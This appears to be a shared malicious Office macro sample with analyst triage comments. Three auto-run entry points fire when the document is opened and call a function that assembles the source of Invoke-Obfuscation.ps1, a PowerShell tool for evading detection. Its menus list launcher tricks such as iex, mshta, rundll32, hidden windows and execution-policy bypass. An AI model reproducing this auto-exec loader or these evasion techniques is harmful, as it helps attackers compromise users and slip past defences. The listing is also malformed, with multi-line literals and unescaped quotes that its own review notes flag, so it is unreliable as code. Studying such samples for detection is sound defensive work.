VBA + Invoke-Obfuscation
## Uploaded by @JohnLaTwC
## Sample hash: b41a2cc5e2975e51b411305215a49d921b0fdf697d6e6d67ccb9bade99850e3c
' Auto-run entry point (Excel): a procedure named Auto_Open is started by the
' host when the workbook is opened with macros enabled.
' Its only statement calls OMq, the Public Function defined after these stubs,
' and discards the Variant it returns.
' Triage note: this sample defines Auto_Open, AutoOpen and Document_Open, all
' forwarding to the same routine. Static macro scanners such as olevba report
' these names as auto-exec keywords.
Sub Auto_Open()
OMq
End Sub
' Auto-run entry point (Word): a macro named AutoOpen is started by the host
' when the document is opened with macros enabled.
' It forwards straight to OMq, the same routine the other two entry points in
' this sample call; the function's return value is not used.
Sub AutoOpen()
OMq
End Sub
' Auto-run entry point (Word): Document_Open is the document's Open event
' procedure, fired when the document is opened with macros enabled.
' Like the other two stubs it does nothing but call OMq.
' NOTE(review): the part of OMq visible in this listing only appends string
' fragments to Ouzw, and those fragments are the text of Invoke-Obfuscation.ps1
' (licence header, help block, menu tables). What is done with the assembled
' string is not shown in this part of the listing.
' NOTE(review): as rendered here, several of those literals span physical lines
' and contain unescaped double quotes, which VBA does not accept. Confirm
' against the original sample before assuming the macro runs as shown.
Sub Document_Open()
OMq
End Sub
Public Function OMq() As Variant
Dim Ouzw As String
Ouzw = "# This file is part of Invoke-Obfuscation.
#
# "
Ouzw = Ouzw + " Copyright 2017 Daniel Bohannon <@danielhbohannon>"
Ouzw = Ouzw + "
# while at Mandiant <http://www.mandiant."
Ouzw = Ouzw + "com>
#
# Licensed under the Apache License, Vers"
Ouzw = Ouzw + "ion 2.0 (the "License");
# you may not use this "
Ouzw = Ouzw + "file except in compliance with the License.
# Yo"
Ouzw = Ouzw + "u may obtain a copy of the License at
#
# ht"
Ouzw = Ouzw + "tp://www.apache.org/licenses/LICENSE-2.0
#
# Unl"
Ouzw = Ouzw + "ess required by applicable law or agreed to in wri"
Ouzw = Ouzw + "ting, software
# distributed under the License i"
Ouzw = Ouzw + "s distributed on an "AS IS" BASIS,
# WITHOUT WAR"
Ouzw = Ouzw + "RANTIES OR CONDITIONS OF ANY KIND, either express "
Ouzw = Ouzw + "or implied.
# See the License for the specific l"
Ouzw = Ouzw + "anguage governing permissions and
# limitations "
Ouzw = Ouzw + "under the License.
Function Invoke-Obfuscation
"
Ouzw = Ouzw + "{
<#
.SYNOPSIS
Master function that orchestrates "
Ouzw = Ouzw + "the application of all obfuscation functions to pr"
Ouzw = Ouzw + "ovided PowerShell script block or script path cont"
Ouzw = Ouzw + "ents. Interactive mode enables one to explore all "
Ouzw = Ouzw + "available obfuscation functions and apply them inc"
Ouzw = Ouzw + "rementally to input PowerShell script block or scr"
Ouzw = Ouzw + "ipt path contents.
Invoke-Obfuscation Function: I"
Ouzw = Ouzw + "nvoke-Obfuscation
Author: Daniel Bohannon (@daniel"
Ouzw = Ouzw + "hbohannon)
License: Apache License, Version 2.0
Re"
Ouzw = Ouzw + "quired Dependencies: Show-AsciiArt, Show-HelpMenu,"
Ouzw = Ouzw + " Show-Menu, Show-OptionsMenu, Show-Tutorial and Ou"
Ouzw = Ouzw + "t-ScriptContents (all located in Invoke-Obfuscatio"
Ouzw = Ouzw + "n.ps1)
Optional Dependencies: None
.DESCRIPTION
"
Ouzw = Ouzw + "
Invoke-Obfuscation orchestrates the application o"
Ouzw = Ouzw + "f all obfuscation functions to provided PowerShell"
Ouzw = Ouzw + " script block or script path contents to evade det"
Ouzw = Ouzw + "ection by simple IOCs and process execution monito"
Ouzw = Ouzw + "ring relying solely on command-line arguments and "
Ouzw = Ouzw + "common parent-child process relationships.
.PARAM"
Ouzw = Ouzw + "ETER ScriptBlock
Specifies a scriptblock containi"
Ouzw = Ouzw + "ng your payload.
.PARAMETER ScriptPath
Specifies"
Ouzw = Ouzw + " the path to your payload (can be local file, UNC-"
Ouzw = Ouzw + "path, or remote URI).
.PARAMETER Command
Specifi"
Ouzw = Ouzw + "es the obfuscation commands to run against the inp"
Ouzw = Ouzw + "ut ScriptBlock or ScriptPath parameter.
.PARAMETE"
Ouzw = Ouzw + "R NoExit
(Optional - only works if Command is spe"
Ouzw = Ouzw + "cified) Outputs the option to not exit after runni"
Ouzw = Ouzw + "ng obfuscation commands defined in Command paramet"
Ouzw = Ouzw + "er.
.PARAMETER Quiet
(Optional - only works if C"
Ouzw = Ouzw + "ommand is specified) Outputs the option to output "
Ouzw = Ouzw + "only the final obfuscated result via stdout.
.EXA"
Ouzw = Ouzw + "MPLE
C:\PS> Import-Module .\Invoke-Obfuscation.ps"
Ouzw = Ouzw + "d1; Invoke-Obfuscation
C:\PS> Import-Module .\Inv"
Ouzw = Ouzw + "oke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBl"
Ouzw = Ouzw + "ock {Write-Host 'Hello World!' -ForegroundColor Gr"
Ouzw = Ouzw + "een; Write-Host 'Obfuscation Rocks!' -ForegroundCo"
Ouzw = Ouzw + "lor Green}
C:\PS> Import-Module .\Invoke-Obfuscat"
Ouzw = Ouzw + "ion.psd1; Invoke-Obfuscation -ScriptBlock {Write-H"
Ouzw = Ouzw + "ost 'Hello World!' -ForegroundColor Green; Write-H"
Ouzw = Ouzw + "ost 'Obfuscation Rocks!' -ForegroundColor Green} -"
Ouzw = Ouzw + "Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,"
Ouzw = Ouzw + "CLIP'
C:\PS> Import-Module .\Invoke-Obfuscation.p"
Ouzw = Ouzw + "sd1; Invoke-Obfuscation -ScriptBlock {Write-Host '"
Ouzw = Ouzw + "Hello World!' -ForegroundColor Green; Write-Host '"
Ouzw = Ouzw + "Obfuscation Rocks!' -ForegroundColor Green} -Comma"
Ouzw = Ouzw + "nd 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'"
Ouzw = Ouzw + " -NoExit
C:\PS> Import-Module .\Invoke-Obfuscatio"
Ouzw = Ouzw + "n.psd1; Invoke-Obfuscation -ScriptBlock {Write-Hos"
Ouzw = Ouzw + "t 'Hello World!' -ForegroundColor Green; Write-Hos"
Ouzw = Ouzw + "t 'Obfuscation Rocks!' -ForegroundColor Green} -Co"
Ouzw = Ouzw + "mmand 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CL"
Ouzw = Ouzw + "IP' -Quiet
C:\PS> Import-Module .\Invoke-Obfuscat"
Ouzw = Ouzw + "ion.psd1; Invoke-Obfuscation -ScriptBlock {Write-H"
Ouzw = Ouzw + "ost 'Hello World!' -ForegroundColor Green; Write-H"
Ouzw = Ouzw + "ost 'Obfuscation Rocks!' -ForegroundColor Green} -"
Ouzw = Ouzw + "Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,"
Ouzw = Ouzw + "CLIP' -NoExit -Quiet
.NOTES
Invoke-Obfuscation o"
Ouzw = Ouzw + "rchestrates the application of all obfuscation fun"
Ouzw = Ouzw + "ctions to provided PowerShell script block or scri"
Ouzw = Ouzw + "pt path contents to evade detection by simple IOCs"
Ouzw = Ouzw + " and process execution monitoring relying solely o"
Ouzw = Ouzw + "n command-line arguments.
This is a personal proje"
Ouzw = Ouzw + "ct developed by Daniel Bohannon while an employee "
Ouzw = Ouzw + "at MANDIANT, A FireEye Company.
.LINK
http://www"
Ouzw = Ouzw + ".danielbohannon.com
#>
[CmdletBinding(Default"
Ouzw = Ouzw + "ParameterSetName = 'ScriptBlock')] Param (
"
Ouzw = Ouzw + " [Parameter(Position = 0, ValueFromPipeline = $Tru"
Ouzw = Ouzw + "e, ParameterSetName = 'ScriptBlock')]
[Val"
Ouzw = Ouzw + "idateNotNullOrEmpty()]
[ScriptBlock]
"
Ouzw = Ouzw + " $ScriptBlock,
[Parameter(Position = 0,"
Ouzw = Ouzw + " ParameterSetName = 'ScriptBlock')]
[Valid"
Ouzw = Ouzw + "ateNotNullOrEmpty()]
[String]
$Scr"
Ouzw = Ouzw + "iptPath,
[String]
$Comman"
Ouzw = Ouzw + "d,
[Switch]
$NoExit,
"
Ouzw = Ouzw + "
[Switch]
$Quiet
)
# "
Ouzw = Ouzw + "Define variables for CLI functionality.
$Scrip"
Ouzw = Ouzw + "t:CliCommands = @()
$Script:CompoundComm"
Ouzw = Ouzw + "and = @()
$Script:QuietWasSpecified = $FALSE"
Ouzw = Ouzw + "
$CliWasSpecified = $FALSE
$NoExi"
Ouzw = Ouzw + "tWasSpecified = $FALSE
# Either convert"
Ouzw = Ouzw + " ScriptBlock to a String or convert script at $Pat"
Ouzw = Ouzw + "h to a String.
If($PSBoundParameters['ScriptBl"
Ouzw = Ouzw + "ock'])
{
$Script:CliCommands += ('set "
Ouzw = Ouzw + "scriptblock ' + [String]$ScriptBlock)
}
If"
Ouzw = Ouzw + "($PSBoundParameters['ScriptPath'])
{
$"
Ouzw = Ouzw + "Script:CliCommands += ('set scriptpath ' + $Script"
Ouzw = Ouzw + "Path)
}
# Append Command to CliCommands i"
Ouzw = Ouzw + "f specified by user input.
If($PSBoundParamete"
Ouzw = Ouzw + "rs['Command'])
{
$Script:CliCommands +"
Ouzw = Ouzw + "= $Command.Split(',')
$CliWasSpecified = $"
Ouzw = Ouzw + "TRUE
If($PSBoundParameters['NoExit'])
"
Ouzw = Ouzw + " {
$NoExitWasSpecified = $TRUE
"
Ouzw = Ouzw + " }
If($PSBoundParameters['Quiet'])
"
Ouzw = Ouzw + " {
# Create empty Write-Host and "
Ouzw = Ouzw + "Start-Sleep proxy functions to cause any Write-Hos"
Ouzw = Ouzw + "t or Start-Sleep invocations to not do anything un"
Ouzw = Ouzw + "til non-interactive -Command values are finished b"
Ouzw = Ouzw + "eing processed.
Function Write-Host {}"
Ouzw = Ouzw + "
Function Start-Sleep {}
$"
Ouzw = Ouzw + "Script:QuietWasSpecified = $TRUE
}
}
"
Ouzw = Ouzw + " ########################################
#"
Ouzw = Ouzw + "# Script-wide variable instantiation ##
######"
Ouzw = Ouzw + "##################################
# Script-l"
Ouzw = Ouzw + "evel array of Show Options menu, set as SCRIPT-lev"
Ouzw = Ouzw + "el so it can be set from within any of the functio"
Ouzw = Ouzw + "ns.
# Build out menu for Show Options selectio"
Ouzw = Ouzw + "n from user in Show-OptionsMenu menu.
$Script:"
Ouzw = Ouzw + "ScriptPath = ''
$Script:ScriptBlock = ''
"
Ouzw = Ouzw + " $Script:CliSyntax = @()
$Script:Exec"
Ouzw = Ouzw + "utionCommands = @()
$Script:ObfuscatedCommand "
Ouzw = Ouzw + "= ''
$Script:ObfuscatedCommandHistory = @()
"
Ouzw = Ouzw + " $Script:ObfuscationLength = ''
$Script:Optio"
Ouzw = Ouzw + "nsMenu = @()
$Script:OptionsMenu += , @('Scr"
Ouzw = Ouzw + "iptPath ' , $Script:ScriptPath , $TRUE"
Ouzw = Ouzw + ")
$Script:OptionsMenu += , @('ScriptBlock' "
Ouzw = Ouzw + " , $Script:ScriptBlock , $TRUE)
$Script"
Ouzw = Ouzw + ":OptionsMenu += , @('CommandLineSyntax' , $Script:"
Ouzw = Ouzw + "CliSyntax , $FALSE)
$Script:OptionsMenu"
Ouzw = Ouzw + " += , @('ExecutionCommands' , $Script:ExecutionCom"
Ouzw = Ouzw + "mands, $FALSE)
$Script:OptionsMenu += , @('Obf"
Ouzw = Ouzw + "uscatedCommand' , $Script:ObfuscatedCommand, $FALS"
Ouzw = Ouzw + "E)
$Script:OptionsMenu += , @('ObfuscationLeng"
Ouzw = Ouzw + "th' , $Script:ObfuscatedCommand, $FALSE)
# Bui"
Ouzw = Ouzw + "ld out $SetInputOptions from above items set as $T"
Ouzw = Ouzw + "RUE (as settable).
$SettableInputOptions = @()"
Ouzw = Ouzw + "
ForEach($Option in $Script:OptionsMenu)
{"
Ouzw = Ouzw + "
If($Option[2]) {$SettableInputOptions += "
Ouzw = Ouzw + "([String]$Option[0]).ToLower().Trim()}
}
"
Ouzw = Ouzw + "# Script-level variable for whether LAUNCHER has b"
Ouzw = Ouzw + "een applied to current ObfuscatedToken.
$Scrip"
Ouzw = Ouzw + "t:LauncherApplied = $FALSE
# Ensure Invoke-Ob"
Ouzw = Ouzw + "fuscation module was properly imported before cont"
Ouzw = Ouzw + "inuing.
If(!(Get-Module Invoke-Obfuscation | W"
Ouzw = Ouzw + "here-Object {$_.ModuleType -eq 'Manifest'}))
{"
Ouzw = Ouzw + "
$PathTopsd1 = "$ScriptDir\Invoke-Obfuscat"
Ouzw = Ouzw + "ion.psd1"
If($PathTopsd1.Contains(' ')) {$"
Ouzw = Ouzw + "PathTopsd1 = '"' + $PathTopsd1 + '"'}
Writ"
Ouzw = Ouzw + "e-Host "`n`nERROR: Invoke-Obfuscation module is no"
Ouzw = Ouzw + "t loaded. You must run:" -ForegroundColor Red
"
Ouzw = Ouzw + " Write-Host " Import-Module $PathTopsd1`n"
Ouzw = Ouzw + "`n" -ForegroundColor Yellow
Exit
}
"
Ouzw = Ouzw + " # Maximum size for cmd.exe and clipboard.
$C"
Ouzw = Ouzw + "mdMaxLength = 8190
# Build interactive me"
Ouzw = Ouzw + "nus.
$LineSpacing = '[*] '
# Main Men"
Ouzw = Ouzw + "u.
$MenuLevel = @()
$MenuLevel+= , @($Li"
Ouzw = Ouzw + "neSpacing, 'TOKEN' , 'Obfuscate PowerShell comm"
Ouzw = Ouzw + "and <Tokens>')
$MenuLevel+= , @($LineSpacing, "
Ouzw = Ouzw + "'STRING' , 'Obfuscate entire command as a <Strin"
Ouzw = Ouzw + "g>')
$MenuLevel+= , @($LineSpacing, 'ENCODING'"
Ouzw = Ouzw + " , 'Obfuscate entire command via <Encoding>')
"
Ouzw = Ouzw + "$MenuLevel+= , @($LineSpacing, 'LAUNCHER' , 'Obfus"
Ouzw = Ouzw + "cate command args w/<Launcher> techniques (run onc"
Ouzw = Ouzw + "e at end)')
# Main\Token Menu.
$MenuL"
Ouzw = Ouzw + "evel_Token = @()
$MenuLevel_"
Ouzw = Ouzw + "Token += , @($LineSpacing, 'STRING'"
Ouzw = Ouzw + " , 'Obfuscate <String> tokens (suggested to ru"
Ouzw = Ouzw + "n first)')
$MenuLevel_Token += "
Ouzw = Ouzw + ", @($LineSpacing, 'COMMAND' , 'Obfuscate <Comma"
Ouzw = Ouzw + "nd> tokens')
$MenuLevel_Token +"
Ouzw = Ouzw + "= , @($LineSpacing, 'ARGUMENT' , 'Obfuscate <Arg"
Ouzw = Ouzw + "ument> tokens')
$MenuLevel_Token "
Ouzw = Ouzw + " += , @($LineSpacing, 'MEMBER' , 'Obfuscate <"
Ouzw = Ouzw + "Member> tokens')
$MenuLevel_Token "
Ouzw = Ouzw + " += , @($LineSpacing, 'VARIABLE' , 'Obfuscate "
Ouzw = Ouzw + "<Variable> tokens')
$MenuLevel_Token "
Ouzw = Ouzw + " += , @($LineSpacing, 'TYPE ' , 'Obfusca"
Ouzw = Ouzw + "te <Type> tokens')
$MenuLevel_Token "
Ouzw = Ouzw + " += , @($LineSpacing, 'COMMENT' , 'Remove a"
Ouzw = Ouzw + "ll <Comment> tokens')
$MenuLevel_Token "
Ouzw = Ouzw + " += , @($LineSpacing, 'WHITESPACE' , 'Inser"
Ouzw = Ouzw + "t random <Whitespace> (suggested to run last)')
"
Ouzw = Ouzw + " $MenuLevel_Token += , @($LineSpac"
Ouzw = Ouzw + "ing, 'ALL ' , 'Select <All> choices from abo"
Ouzw = Ouzw + "ve (random order)')
$MenuLevel_Token_Stri"
Ouzw = Ouzw + "ng = @()
$MenuLevel_Token_String "
Ouzw = Ouzw + " += , @($LineSpacing, '1' , "Concatenate --> "
Ouzw = Ouzw + "e.g. <('co'+'ffe'+'e')>" "
Ouzw = Ouzw + " , @('Out-ObfuscatedTokenCommand', 'String', 1))
"
Ouzw = Ouzw + " $MenuLevel_Token_String += , @($LineSpa"
Ouzw = Ouzw + "cing, '2' , "Reorder --> e.g. <('{1}{0}'-f'ffe"
Ouzw = Ouzw + "e','co')>" , @('Out-ObfuscatedT"
Ouzw = Ouzw + "okenCommand', 'String', 2))
$MenuLevel_To"
Ouzw = Ouzw + "ken_Command = @()
$MenuLevel_Token_C"
Ouzw = Ouzw + "ommand += , @($LineSpacing, '1' , 'Ticks "
Ouzw = Ouzw + " --> e.g. <Ne`w-O`Bject>' "
Ouzw = Ouzw + " , @('Out-ObfuscatedTokenCommand', 'Comman"
Ouzw = Ouzw + "d', 1))
$MenuLevel_Token_Command += , @"
Ouzw = Ouzw + "($LineSpacing, '2' , "Splatting + Concatenate --> "
Ouzw = Ouzw + "e.g. <&('Ne'+'w-Ob'+'ject')>" , @('Out-Ob"
Ouzw = Ouzw + "fuscatedTokenCommand', 'Command', 2))
$MenuLev"
Ouzw = Ouzw + "el_Token_Command += , @($LineSpacing, '3' ,"
Ouzw = Ouzw + " "Splatting + Reorder --> e.g. <&('{1}{0}'-f'b"
Ouzw = Ouzw + "ject','New-O')>" , @('Out-ObfuscatedTokenCommand"
Ouzw = Ouzw + "', 'Command', 3))
$MenuLevel_Token_Argume"
Ouzw = Ouzw + "nt = @()
$MenuLevel_Token_Argument "
Ouzw = Ouzw + " += , @($LineSpacing, '1' , 'Random Case --> e."
Ouzw = Ouzw + "g. <nEt.weBclIenT>' ,"
Ouzw = Ouzw + " @('Out-ObfuscatedTokenCommand', 'CommandArgument'"
Ouzw = Ouzw + ", 1))
$MenuLevel_Token_Argument += , @($"
Ouzw = Ouzw + "LineSpacing, '2' , 'Ticks --> e.g. <nE`T.we`"
Ouzw = Ouzw + "Bc`lIe`NT>' , @('Out-Obfu"
Ouzw = Ouzw + "scatedTokenCommand', 'CommandArgument', 2))
$M"
Ouzw = Ouzw + "enuLevel_Token_Argument += , @($LineSpacing,"
Ouzw = Ouzw + " '3' , "Concatenate --> e.g. <('Ne'+'t.We'+'bClien"
Ouzw = Ouzw + "t')>" , @('Out-ObfuscatedTokenC"
Ouzw = Ouzw + "ommand', 'CommandArgument', 3))
$MenuLevel_Tok"
Ouzw = Ouzw + "en_Argument += , @($LineSpacing, '4' , "Reor"
Ouzw = Ouzw + "der --> e.g. <('{1}{0}'-f'bClient','Net.We')>""
Ouzw = Ouzw + " , @('Out-ObfuscatedTokenCommand', 'Co"
Ouzw = Ouzw + "mmandArgument', 4))
$MenuLevel_Token_Memb"
Ouzw = Ouzw + "er = @()
$MenuLevel_Token_Member "
Ouzw = Ouzw + " += , @($LineSpacing, '1' , 'Random Case --> "
Ouzw = Ouzw + "e.g. <dOwnLoAdsTRing>' "
Ouzw = Ouzw + " , @('Out-ObfuscatedTokenCommand', 'Member', 1))
"
Ouzw = Ouzw + " $MenuLevel_Token_Member += , @($LineSpa"
Ouzw = Ouzw + "cing, '2' , 'Ticks --> e.g. <d`Ow`NLoAd`STRi"
Ouzw = Ouzw + "n`g>' , @('Out-ObfuscatedT"
Ouzw = Ouzw + "okenCommand', 'Member', 2))
$MenuLevel_Token_M"
Ouzw = Ouzw + "ember += , @($LineSpacing, '3' , "Concaten"
Ouzw = Ouzw + "ate --> e.g. <('dOwnLo'+'AdsT'+'Ring').Invoke()>" "
Ouzw = Ouzw + " , @('Out-ObfuscatedTokenCommand', 'Member"
Ouzw = Ouzw + "', 3))
$MenuLevel_Token_Member += , @("
Ouzw = Ouzw + "$LineSpacing, '4' , "Reorder --> e.g. <('{1}{0"
Ouzw = Ouzw + "}'-f'dString','Downloa').Invoke()>" , @('Out-Obf"
Ouzw = Ouzw + "uscatedTokenCommand', 'Member', 4))
$Menu"
Ouzw = Ouzw + "Level_Token_Variable = @()
$MenuLevel"
Ouzw = Ouzw + "_Token_Variable += , @($LineSpacing, '1' , '"
Ouzw = Ouzw + "Random Case + {} + Ticks --> e.g. <${c`hEm`eX}>' "
Ouzw = Ouzw + " , @('Out-ObfuscatedTokenCommand',"
Ouzw = Ouzw + " 'Variable', 1))
$MenuLevel_Token_Type "
Ouzw = Ouzw + " = @()
$MenuLevel_Token_Type "
Ouzw = Ouzw + " += , @($LineSpacing, '1' , "Type Cast + Concate"
Ouzw = Ouzw + "nate --> e.g. <[Type]('Con'+'sole')>" , "
Ouzw = Ouzw + "@('Out-ObfuscatedTokenCommand', 'Type', 1))
$M"
Ouzw = Ouzw + "enuLevel_Token_Type += , @($LineSpacing,"
Ouzw = Ouzw + " '2' , "Type Cast + Reordered --> e.g. <[Type]('"
Ouzw = Ouzw + "{1}{0}'-f'sole','Con')>" , @('Out-ObfuscatedTokenC"
Ouzw = Ouzw + "ommand', 'Type', 2))
$MenuLevel_Token_Whi"
Ouzw = Ouzw + "tespace = @()
$MenuLevel_Token_Whitespa"
Ouzw = Ouzw + "ce += , @($LineSpacing, '1' , "`tRandom Whites"
Ouzw = Ouzw + "pace --> e.g. <.( 'Ne' +'w-Ob' + 'ject')>" "
Ouzw = Ouzw + " , @('Out-ObfuscatedTokenCommand', 'RandomWhitesp"
Ouzw = Ouzw + "ace', 1))
$MenuLevel_Token_Comment "
Ouzw = Ouzw + " = @()
$MenuLevel_Token_Comment += ,"
Ouzw = Ouzw + " @($LineSpacing, '1' , "Remove Comments --> e.g."
Ouzw = Ouzw + " self-explanatory" , @('Out-"
Ouzw = Ouzw + "ObfuscatedTokenCommand', 'Comment', 1))
$Menu"
Ouzw = Ouzw + "Level_Token_All = @()
$MenuLevel"
Ouzw = Ouzw + "_Token_All += , @($LineSpacing, '1' , ""
Ouzw = Ouzw + "`tExecute <ALL> Token obfuscation techniques (rand"
Ouzw = Ouzw + "om order)" , @('Out-ObfuscatedTokenCommandAl"
Ouzw = Ouzw + "l', '', ''))
# Main\String Menu.
$Men"
Ouzw = Ouzw + "uLevel_String = @()
$MenuLeve"
Ouzw = Ouzw + "l_String += , @($LineSpacing, '1' , "
Ouzw = Ouzw + "'<Concatenate> entire command' "
Ouzw = Ouzw + " , @('Out-ObfuscatedStringCommand"
Ouzw = Ouzw + "', '', 1))
$MenuLevel_String += "
Ouzw = Ouzw + ", @($LineSpacing, '2' , '<Reorder> entire command "
Ouzw = Ouzw + "after concatenating' , @('Out"
Ouzw = Ouzw + "-ObfuscatedStringCommand', '', 2))
$MenuLevel_"
Ouzw = Ouzw + "String += , @($LineSpacing, '3' , '<"
Ouzw = Ouzw + "Reverse> entire command after concatenating' "
Ouzw = Ouzw + " , @('Out-ObfuscatedStringCommand',"
Ouzw = Ouzw + " '', 3))
# Main\Encoding Menu.
$MenuLevel"
Ouzw = Ouzw + "_Encoding = @()
$MenuLevel_Enco"
Ouzw = Ouzw + "ding += , @($LineSpacing, '1' , "`tEnc"
Ouzw = Ouzw + "ode entire command as <ASCII>" "
Ouzw = Ouzw + " , @('Out-EncodedAsciiCommand' "
Ouzw = Ouzw + " , '', ''))
$MenuLevel_Encoding +"
Ouzw = Ouzw + "= , @($LineSpacing, '2' , "`tEncode entire command"
Ouzw = Ouzw + " as <Hex>" , @('O"
Ouzw = Ouzw + "ut-EncodedHexCommand' , '', ''))
$"
Ouzw = Ouzw + "MenuLevel_Encoding += , @($LineSpacing"
Ouzw = Ouzw + ", '3' , "`tEncode entire command as <Octal>" "
Ouzw = Ouzw + " , @('Out-EncodedOctalCom"
Ouzw = Ouzw + "mand' , '', ''))
$MenuLevel_Encoding"
Ouzw = Ouzw + " += , @($LineSpacing, '4' , "`tEncode "
Ouzw = Ouzw + "entire command as <Binary>" "
Ouzw = Ouzw + " , @('Out-EncodedBinaryCommand' , "
Ouzw = Ouzw + "'', ''))
$MenuLevel_Encoding += , "
Ouzw = Ouzw + "@($LineSpacing, '5' , "`tEncrypt entire command as"
Ouzw = Ouzw + " <SecureString> (AES)" , @('Out-S"
Ouzw = Ouzw + "ecureStringCommand' , '', ''))
$Menu"
Ouzw = Ouzw + "Level_Encoding += , @($LineSpacing, '6"
Ouzw = Ouzw + "' , "`tEncode entire command as <BXOR>" "
Ouzw = Ouzw + " , @('Out-EncodedBXORCommand'"
Ouzw = Ouzw + " , '', ''))
$MenuLevel_Encoding "
Ouzw = Ouzw + " += , @($LineSpacing, '7' , "`tEncode enti"
Ouzw = Ouzw + "re command as <Special Characters>" "
Ouzw = Ouzw + " , @('Out-EncodedSpecialCharOnlyCommand' , '', "
Ouzw = Ouzw + "''))
$MenuLevel_Encoding += , @($L"
Ouzw = Ouzw + "ineSpacing, '8' , "`tEncode entire command as <Whi"
Ouzw = Ouzw + "tespace>" , @('Out-Encod"
Ouzw = Ouzw + "edWhitespaceCommand' , '', ''))
# Main\L"
Ouzw = Ouzw + "auncher Menu.
$MenuLevel_Launcher "
Ouzw = Ouzw + " = @()
$MenuLevel_Launcher += , "
Ouzw = Ouzw + "@($LineSpacing, 'PS' , "`t<PowerShell>""
Ouzw = Ouzw + ")
$MenuLevel_Launcher += , @($Line"
Ouzw = Ouzw + "Spacing, 'CMD' , '<Cmd> + PowerShell')
"
Ouzw = Ouzw + " $MenuLevel_Launcher += , @($LineSpa"
Ouzw = Ouzw + "cing, 'WMIC' , '<Wmic> + PowerShell')
"
Ouzw = Ouzw + " $MenuLevel_Launcher += , @($LineSpaci"
Ouzw = Ouzw + "ng, 'RUNDLL' , '<Rundll32> + PowerShell')
"
Ouzw = Ouzw + " $MenuLevel_Launcher += , @($LineSpa"
Ouzw = Ouzw + "cing, 'VAR+' , 'Cmd + set <Var> && PowerS"
Ouzw = Ouzw + "hell iex <Var>')
$MenuLevel_Launcher "
Ouzw = Ouzw + " += , @($LineSpacing, 'STDIN+' , 'Cmd + <"
Ouzw = Ouzw + "Echo> | PowerShell - (stdin)')
$MenuLevel_Laun"
Ouzw = Ouzw + "cher += , @($LineSpacing, 'CLIP+' "
Ouzw = Ouzw + " , 'Cmd + <Echo> | Clip && PowerShell iex <clip"
Ouzw = Ouzw + "board>')
$MenuLevel_Launcher += , "
Ouzw = Ouzw + "@($LineSpacing, 'VAR++' , 'Cmd + set <Var>"
Ouzw = Ouzw + " && Cmd && PowerShell iex <Var>')
$MenuLevel_L"
Ouzw = Ouzw + "auncher += , @($LineSpacing, 'STDIN++'"
Ouzw = Ouzw + " , 'Cmd + set <Var> && Cmd <Echo> | PowerShe"
Ouzw = Ouzw + "ll - (stdin)')
$MenuLevel_Launcher "
Ouzw = Ouzw + " += , @($LineSpacing, 'CLIP++' , 'Cmd + <Ec"
Ouzw = Ouzw + "ho> | Clip && Cmd && PowerShell iex <clipboard>')
"
Ouzw = Ouzw + " $MenuLevel_Launcher += , @($LineSp"
Ouzw = Ouzw + "acing, 'RUNDLL++' , 'Cmd + set Var && <Rundll"
Ouzw = Ouzw + "32> && PowerShell iex Var')
$MenuLevel_Launche"
Ouzw = Ouzw + "r += , @($LineSpacing, 'MSHTA++' "
Ouzw = Ouzw + " , 'Cmd + set Var && <Mshta> && PowerShell iex Var"
Ouzw = Ouzw + "')
$MenuLevel_Launcher_PS = @()
"
Ouzw = Ouzw + " $MenuLevel_Launcher_PS += , @("Enter s"
Ouzw = Ouzw + "tring of numbers with all desired flags to pass to"
Ouzw = Ouzw + " function. (e.g. 23459)`n", '' , '' , @('', '',"
Ouzw = Ouzw + " ''))
$MenuLevel_Launcher_PS += , @($"
Ouzw = Ouzw + "LineSpacing, '0' , 'NO EXECUTION FLAGS' "
Ouzw = Ouzw + " , @('Out-PowerShell"
Ouzw = Ouzw + "Launcher', '', '1'))
$MenuLevel_Launcher_PS "
Ouzw = Ouzw + " += , @($LineSpacing, '1' , '-NoExit' "
Ouzw = Ouzw + " , @("
Ouzw = Ouzw + "'Out-PowerShellLauncher', '', '1'))
$MenuLevel"
Ouzw = Ouzw + "_Launcher_PS += , @($LineSpacing, '2' , '"
Ouzw = Ouzw + "-NonInteractive' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '1'))"
Ouzw = Ouzw + "
$MenuLevel_Launcher_PS += , @($LineS"
Ouzw = Ouzw + "pacing, '3' , '-NoLogo' "
Ouzw = Ouzw + " , @('Out-PowerShellLaunc"
Ouzw = Ouzw + "her', '', '1'))
$MenuLevel_Launcher_PS "
Ouzw = Ouzw + " += , @($LineSpacing, '4' , '-NoProfile' "
Ouzw = Ouzw + " , @('Out-"
Ouzw = Ouzw + "PowerShellLauncher', '', '1'))
$MenuLevel_Laun"
Ouzw = Ouzw + "cher_PS += , @($LineSpacing, '5' , '-Comm"
Ouzw = Ouzw + "and' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '1'))
"
Ouzw = Ouzw + "$MenuLevel_Launcher_PS += , @($LineSpacin"
Ouzw = Ouzw + "g, '6' , '-WindowStyle Hidden' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher',"
Ouzw = Ouzw + " '', '1'))
$MenuLevel_Launcher_PS += "
Ouzw = Ouzw + ", @($LineSpacing, '7' , '-ExecutionPolicy Bypass' "
Ouzw = Ouzw + " , @('Out-Power"
Ouzw = Ouzw + "ShellLauncher', '', '1'))
$MenuLevel_Launcher_"
Ouzw = Ouzw + "PS += , @($LineSpacing, '8' , '-Wow64 (to"
Ouzw = Ouzw + " path 32-bit powershell.exe)' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '', '1'))
$Men"
Ouzw = Ouzw + "uLevel_Launcher_CMD = @()
$MenuLeve"
Ouzw = Ouzw + "l_Launcher_CMD += , @("Enter string of num"
Ouzw = Ouzw + "bers with all desired flags to pass to function. ("
Ouzw = Ouzw + "e.g. 23459)`n", '' , '' , @('', '', ''))
$M"
Ouzw = Ouzw + "enuLevel_Launcher_CMD += , @($LineSpacing,"
Ouzw = Ouzw + " '0' , 'NO EXECUTION FLAGS' "
Ouzw = Ouzw + " , @('Out-PowerShellLauncher', '"
Ouzw = Ouzw + "', '2'))
$MenuLevel_Launcher_CMD += , "
Ouzw = Ouzw + "@($LineSpacing, '1' , '-NoExit' "
Ouzw = Ouzw + " , @('Out-PowerSh"
